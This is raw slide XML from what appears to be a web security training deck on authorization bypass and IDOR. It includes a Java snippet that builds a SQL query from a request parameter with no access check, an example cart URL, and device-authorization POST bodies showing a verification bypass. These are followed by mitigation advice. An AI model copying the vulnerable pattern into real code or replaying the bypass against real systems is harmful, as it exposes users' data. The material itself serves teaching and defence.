            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A combination of both</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>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Authorization Bypass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1358" name="Google Shape;1358;p195"/>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Authorization (AuthZ) verifies a user is allowed to perform an action</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>For example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Can the user access this record? Can the user perform this update? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authorizations will often be checked based on the user, their groups, and their roles</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Failing to verify authorizations for each action requested can lead to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show me /id/1 that I own and /id/2 someone else owns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Arbitrary File Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A file is in a readable web root, even though it should be readable by only certain users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An unauthenticated guest visiting a web site can execute administrator methods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Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p196"/>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Occurs when objects stored in backend systems are referenced directly by the application and no authorization check is performed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> = Integer.parseInt( request.getParameter( "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" ) );</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  	String query = "SELECT * FROM table WHERE cartID=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker just needs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> of the object ID to access another user’s cart</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>https://swag.duo.com/display.jsp?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cartID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>=27</a:t>
            </a:r>
            <a:endParaRPr sz="1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IDOR AuthZ Bypass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1370" name="Google Shape;1370;p197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3379225"/>
            <a:ext cx="1611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63F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>No Verification, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Device Added</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Google Shape;1371;p197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1909825"/>
            <a:ext cx="1611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63F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> Verification </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> Required</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2105300" y="1662550"/>
            <a:ext cx="320700" cy="1271400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF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97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2303575" y="1580925"/>
            <a:ext cx="320700" cy="143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97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2105300" y="3097150"/>
            <a:ext cx="320700" cy="1271400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF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97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2303575" y="3015525"/>
            <a:ext cx="320700" cy="143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97"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1825400" y="1152475"/>
            <a:ext cx="73323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b="1">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>POST /device-authorization HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>{“deviceAuth[remember]”:true,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>”deviceAuth[answer]”:”test”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3000" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>POST /device-authorization HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>{“deviceAuth[remember]”:true}</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1377" name="Google Shape;1377;p197"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1372" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1364600" y="2298250"/>
            <a:ext cx="740700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1378" name="Google Shape;1378;p197"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1374" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1615400" y="3732850"/>
            <a:ext cx="489900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="non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sp>
        <p:nvSpPr>
          <p:cNvPr id="1384" name="Google Shape;1384;p198"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8214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AuthZ decisions should be made server-side, with trusted data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AuthZ policy should be default deny</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AuthZ policy should use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Principle of Least Privilege</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use authentication + authorization to protect all resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use high-level methods that apply to entire controllers/directories/paths</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use existing authorization mechanism present in the framework, if available</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Code so all requests go through the AuthZ method/function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do not place non-web files in a web servable directory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do not implement per page manual authorization checks</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1385" name="Google Shape;1385;p198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6963125" y="2299324"/>
            <a:ext cx="2413625" cy="2416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99"/>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Cross-Site Scripting (XSS)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200"/>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396" name="Google Shape;1396;p200"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194500" y="1149800"/>
            <a:ext cx="4802700" cy="3505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Let’s talk about...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Relationship with HTML, CSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript’s role in modern applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
